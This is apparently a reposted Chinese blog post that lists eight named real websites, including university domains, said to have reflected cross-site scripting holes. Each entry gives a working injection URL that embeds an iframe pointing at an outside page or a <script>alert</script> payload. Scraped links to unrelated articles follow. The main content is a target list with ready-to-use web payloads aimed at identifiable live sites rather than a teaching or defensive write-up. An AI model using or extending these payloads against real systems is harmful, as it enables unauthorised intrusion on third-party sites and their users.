from :http://blog.sina.com.cn/s/blog_68d342d90100nh7b.html

什么是XSS跨站攻击:
http://baike.baidu.com/view/50325.htm
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://sqxhsp.com/news.asp?cat_id=11&types=企业新闻
XSS跨站漏洞测试页面:
http://sqxhsp.com/sever.asp?cat_id=58&types=<iframe src=http://blog.sina.com.cn/aboutshisan width=600 height=400></iframe>
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://www.zyfw365.com/newscontent.aspx?myclass=就业形式&title=就业形势好转 2010年新增就业目标900万人&infoid=435
XSS跨站漏洞测试页面:
http://www.zyfw365.com/newscontent.aspx?myclass=<iframe src=http://blog.sina.com.cn/aboutshisan width=600 heightt=400></iframe>&title=就业形势好转 2010年新增就业目标900万人&infoid=435
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://manage.hncc.edu.cn/more.asp?typeid=16&bigclass=
XSS跨站漏洞测试页面:
http://manage.hncc.edu.cn/more.asp?typeid=16&bigclass=<iframe src=http://blog.sina.com.cn/aboutshisan width=600 heightt=400></iframe>
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://jwc.xjmu.edu.cn/_help/Sorry.aspx?str=
XSS跨站漏洞测试页面:
http://jwc.xjmu.edu.cn/_help/Sorry.aspx?str=<script>alert('silic_tank')</script>
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://alpas.com/qiye/Product.asp?BigClassName=产品销售
XSS跨站漏洞测试页面:
http://alpas.com/qiye/Product.asp?BigClassName=产品销售<script>alert('silic_tank')</script>
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://www.yangheyuyang.com/error.asp?msg=
XSS跨站漏洞测试页面:
http://www.yangheyuyang.com/error.asp?msg=<script>alert('silic')</script>
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://www.3v.cm/error.asp?errmsg=
XSS跨站漏洞测试页面:
http://www.3v.cm/error.asp?errmsg=<script>alert('yf4n')</script>
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://www.blueidea.com/common/searchbykey.asp?keyword=painter
XSS跨站漏洞测试页面:
http://www.blueidea.com/common/searchbykey.asp?keyword=painter<script>alert('silic')</script>

find xss的更多相关文章

  1. 防御XSS攻击-encode用户输入内容的重要性

    一.开场先科普下XSS 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS.恶 ...

  2. XSS

    XSS的含义 XSS(Cross Site Scripting)即跨站脚本.跨站的主要内容是在脚本上. 跨站脚本 跨站脚本的跨,体现了浏览器的特性,可以跨域.所以也就给远程代码或者第三方域上的代码提供 ...

  3. 【XSS】延长 XSS 生命期

    XSS 的本质仍是一段脚本.和其他文档元素一样,页面关了一切都销毁.除非能将脚本蔓延到页面以外的地方,那样才能获得更长的生命力. 庆幸的是,从 DOM 诞生的那一天起,就已为我们准备了这个特殊的功能, ...

  4. 探索ASP.NET MVC5系列之~~~2.视图篇(上)---包含XSS防御和异步分部视图的处理

    其实任何资料里面的任何知识点都无所谓,都是不重要的,重要的是学习方法,自行摸索的过程(不妥之处欢迎指正) 汇总:http://www.cnblogs.com/dunitian/p/4822808.ht ...

  5. XSS分析及预防

    XSS(Cross Site Scripting),又称跨站脚本,XSS的重点不在于跨站点,而是在于脚本的执行.在WEB前端应用日益发展的今天,XSS漏洞尤其容易被开发人员忽视,最终可能造成对个人信息 ...

  6. 个人网站对xss跨站脚本攻击(重点是富文本编辑器情况)和sql注入攻击的防范

    昨天本博客受到了xss跨站脚本注入攻击,3分钟攻陷--其实攻击者进攻的手法很简单,没啥技术含量.只能感叹自己之前竟然完全没防范. 这是数据库里留下的一些记录.最后那人弄了一个无限循环弹出框的脚本,估计 ...

  7. xss和sql注入原理学习

    8.4 Web跨站脚本攻击 8.4.1  跨站脚本攻击的原理(1) 跨站脚本在英文中称为Cross-Site Scripting,缩写为CSS.但是,由于层叠样式表 (Cascading Style ...

  8. XSS 前端防火墙 —— 整装待发

    到目前为止,我们把能用前端脚本防御 XSS 的方案都列举了一遍. 尽管看起来似乎很复杂累赘,不过那些是理论探讨而已,在实际中未必要都实现.我们的目标只是为了预警,能发现问题就行,并非要做到滴水不漏的程 ...

  9. XSS 前端防火墙 —— 天衣无缝的防护

    上一篇讲解了钩子程序的攻防实战,并实现了一套对框架页的监控方案,将防护作用到所有子页面. 到目前为止,我们防护的深度已经差不多,但广度还有所欠缺. 例如,我们的属性钩子只考虑了 setAttribut ...

  10. XSS 前端防火墙 —— 无懈可击的钩子

    昨天尝试了一系列的可疑模块拦截试验,尽管最终的方案还存在着一些兼容性问题,但大体思路已经明确了: 静态模块:使用 MutationObserver 扫描. 动态模块:通过 API 钩子来拦截路径属性. ...

随机推荐

  1. NodeJs中npm使用

    什么是 NPM npm 之于 Node ,就像 pip 之于 Python , gem 之于 Ruby , pear 之于 PHP . npm 是 Node 官方提供的包管理工具,他已经成了 Node ...

  2. Elasticsearch-->Get Started-->Modifying Your Data

    https://www.elastic.co/guide/en/elasticsearch/reference/current/getting-started-modify-data.html Mod ...

  3. 【安装】Redis4.0.10在Linux环境搭建

    1.下载Redis后上传到指定目录 2.解压 tar -zxvf redis-4.0.10.tar.gz 3.进入加压后的目录并编译 cd redis-4.0.10 make 4.进入src目录安装 ...

  4. 为什么返回的数据前面有callback?

    这是一个同学出现的问题,问到了我. 应该是这样的: 但问题是这样的: 我看了所请求的格式和后台要求的也是相同的.而且我也是这种做法,为什么他的就不行呢? 打了几遍 JSON.parse 也都是不行…… ...

  5. 1、http协议基础及IO模型

    Nginx (web server,web reverse proxy): http协议:80/tcp,HyperText Transfer Procotol http协议版本: HTTP/0.9:原 ...

  6. java根据地址获取百度API经纬度

    java根据地址获取百度API经纬度(详细文档) public void getLarLng(String address) throws Exception { String ak = " ...

  7. vs2013 报错error C1083: 无法打开包括文件:“gl\glew.h”: No such file or directory\

    vs报错诸如如无法打开“gl\xxx.h”时, 解决方法: 1.去http://glew.sourceforge.net/下载相关文件,2.在下载下来的文件里找到xxx.h,将其复制到vs的相关目录下 ...

  8. IPC 之 Binder 初识

    概述 最近在看Android 的 IPC 机制,想要系统的研究一下,然后就走到了 Binder 这里,发现这个东西真是复杂,查看了一下些文章想要记录下.想要自己写但是发现一篇文章已经写的非常好了,就转 ...

  9. 力扣(LeetCode)292. Nim游戏 巴什博奕

    你和你的朋友,两个人一起玩 Nim游戏:桌子上有一堆石头,每次你们轮流拿掉 1 - 3 块石头. 拿掉最后一块石头的人就是获胜者.你作为先手. 你们是聪明人,每一步都是最优解. 编写一个函数,来判断你 ...

  10. git 放弃本地修改

     本文以转移至本人的个人博客,请多多关注! 如果在修改时发现修改错误,而要放弃本地修改时, 一, 未使用 git add 缓存代码时. 可以使用 git checkout -- filepathnam ...